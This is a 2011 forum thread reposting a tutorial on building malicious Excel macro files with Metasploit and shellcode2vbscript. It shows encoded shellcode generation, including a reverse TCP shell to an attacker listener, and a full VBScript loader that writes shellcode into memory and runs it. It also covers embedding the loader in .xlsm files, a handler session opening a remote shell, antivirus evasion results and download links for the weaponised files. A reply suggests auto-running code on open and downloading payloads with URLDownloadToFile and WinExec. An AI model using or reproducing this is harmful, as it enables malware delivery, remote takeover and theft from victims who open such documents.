Active Members Fi8sVrs Posted July 17, 2011 Active Members Report Posted July 17, 2011 First, let's create our shellcode using metasploit's msfpayload:For windows/exec payload:root@coresec:~# msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai \ -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > CALC.R[*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 254 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 281 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 308 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 335 (iteration=5)For reverse_tcp payload:root@coresec:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.200.20 LPORT=4444 R | msfencode \ -e x86/shikata_ga_nai -c 5 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > RVR.R[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)For your own executable file:root@coresec:~# msfencode -i backdoor.exe -e x86/shikata_ga_nai -c 10 \ -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BD.R[*] x86/shikata_ga_nai succeeded with size 66589 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 66618 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 66647 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 66676 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 66705 (iteration=5)Next step is to convert shellcodes to VBScript using the shellcode2vbscript_v0_1 python tool from Didier Stevens:root@coresec:~# wget http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zip--2011-04-23 14:30:31-- http://www.didierstevens.com/files/software/shellcode2vbscript_v0_1.zipResolving www.didierstevens.com... 173.201.107.126Connecting to www.didierstevens.com|173.201.107.126|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 1378 (1.3K) [application/x-zip-compressed]Saving to: `shellcode2vbscript_v0_1.zip'100%[===========================================================>] 1,378 --.-K/s in 0s 2011-04-23 14:30:52 (86.4 MB/s) - `shellcode2vbscript_v0_1.zip' saved [1378/1378]root@coresec:~# mkdir shellcode2vbscriptroot@coresec:~# unzip shellcode2vbscript_v0_1.zip -d shellcode2vbscriptArchive: shellcode2vbscript_v0_1.zip inflating: shellcode2vbscript/shellcode2vbscript.pyroot@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py CALC.R CALC.vbsroot@coresec:~# python shellcode2vbscript_v0_1/shellcode2vbscript.py RVR.R RVR.vbsroot@coresec:~# ls -al CALC.vbs RVR.vbs-rw-r--r-- 1 root root 3418 Apr 23 14:29 CALC.vbs-rw-r--r-- 1 root root 3888 Apr 23 14:30 RVR.vbsNow, our VBScripts are ready, lets see the code of CALC.vbs:Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPrivate Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As IntegerPrivate Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As LongConst MEM_COMMIT = &H1000Const PAGE_EXECUTE_READWRITE = &H40Private Sub ExecuteShellCode() Dim lpMemory As Long Dim sShellCode As String Dim lResult As Long sShellCode = ShellCode() lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE) lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&) lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&)End SubPrivate Function ParseBytes(strBytes) As String Dim aNumbers Dim sShellCode As String Dim iIter sShellCode = "" aNumbers = split(strBytes) for iIter = lbound(aNumbers) to ubound(aNumbers) sShellCode = sShellCode + Chr(aNumbers(iIter)) next ParseBytes = sShellCodeEnd FunctionPrivate Function ShellCode1() As String Dim sShellCode As String sShellCode = "" sShellCode = sShellCode + ParseBytes("218 203 184 213 89 140 182 217 116 36 244 95 51 201 177 78 131 239 252 49 71 19 3") sShellCode = sShellCode + ParseBytes("146 74 110 67 199 185 183 216 211 181 243 2 32 140 238 29 101 57 95 218 184 225 184") sShellCode = sShellCode + ParseBytes("102 82 237 186 48 149 215 242 145 177 70 202 221 13 155 44 133 217 202 138 232 188") sShellCode = sShellCode + ParseBytes("196 51 198 163 90 239 67 214 55 124 8 120 173 104 221 142 124 57 128 1 165 213 25") sShellCode = sShellCode + ParseBytes("211 78 145 37 3 200 28 171 244 145 218 247 129 189 181 255 86 252 194 249 233 79 245") sShellCode = sShellCode + ParseBytes("2 25 97 248 38 184 12 119 242 187 205 87 102 116 144 151 201 158 251 33 25 5 144 53") sShellCode = sShellCode + ParseBytes("100 184 8 207 129 122 171 10 62 99 17 116 34 148 79 156 42 73 228 18 96 6 167 143") sShellCode = sShellCode + ParseBytes("228 34 41 111 247 123 85 247 68 166 80 189 205 190 158 93 137 28 108 212 133 52 185") sShellCode = sShellCode + ParseBytes("215 180 95 192 145 200 108 24 117 173 140 206 118 82 154 64 167 202 183 53 137 2 91") sShellCode = sShellCode + ParseBytes("80 100 244 232 208 219 177 71 199 253 147 155 121 72 25 62 202 76 46 221 95 172 86") sShellCode = sShellCode + ParseBytes("237 36 238 199 178 145 95 176 119 135 37 122 45 141 64 166 103 5 48 237 174 171 192") sShellCode = sShellCode + ParseBytes("243 41 24 82 137 232 168 50 187 1 241 73 171 228 212 185 165 227 15 22 27 4 14 205") sShellCode = sShellCode + ParseBytes("66 211 92 161 216 171 236 199 7 240 255 87 192 38 121 162 8 216 18 111 250 92 45 32") sShellCode = sShellCode + ParseBytes("247 238 33 196 105 210 232 13 127 104 232 201 95 57 96 189 67 97 242 253 193 198 186") sShellCode = sShellCode + ParseBytes("109 199 61 47 71 59 141 138 186 249") ShellCode1 = sShellCodeEnd FunctionPrivate Function ShellCode() As String Dim sShellCode As String sShellCode = "" sShellCode = sShellCode + ShellCode1() ShellCode = sShellCodeEnd FunctionThen, we are able to insert the malicious VBScript to our Excel files (CALC.vbs -> CALC.xlsm & RVR.vbs -> RVR.xlsm):Finally let's execute our Macros:root@coresec:~# msfconsole | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | |_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.7.0-dev [core:3.7 api:1.0]+ -- --=[ 680 exploits - 354 auxiliary+ -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12397 updated yesterday (2011.04.21)msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/shell/reverse_tcpPAYLOAD => windows/shell/reverse_tcpmsf exploit(handler) > set lhost 192.168.200.20lhost => 192.168.200.20msf exploit(handler) > set lport 4444lport => 4444msf exploit(handler) > exploit[*] Started reverse handler on 192.168.200.20:4444[*] Starting the payload handler...[*] Sending stage (240 bytes) to 192.168.200.2[*] Command shell session 1 opened (192.168.200.20:4444 -> 192.168.200.25:45668) at Sat Apr 23 14:54:32 +0300 2011Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Users\coresec\Documents>NoVirusThanks results:Download:shellcode2vbscript_v0_1RVR.xlsmCALC.xlsmCreate Malicious Excel files using Metasploit and Shellcode2vbscript « AfterShell.com – IT Security Blog Quote
Nytro Posted July 17, 2011 Report Posted July 17, 2011 Dragut, dar nu trebuie sa fie "activate" (enabled) macro-urile? In 98% din cazuri nu sunt activate. Excel Options -> Trust Center -> Trust Center Settings, implicit e "Disable all macros with notification". Din cate stiu apare un mesaj care te intreaba daca sa fie rulate. Dar nu stiu cati dau "Yes". oricum, parca exista si "Sheet_Load" sau ceva asemanator si puteai pune sa se execute un cod la deschiderea fisierului Excel daca erau Macro enabled, deci nu trebuia ca victima sa apese pe ceva. Iar daca sunt activate chiar nu e necesar atata chin, cu doua linii de cod, cu URLDownloadToFile si WinExec faci ce doresti. Quote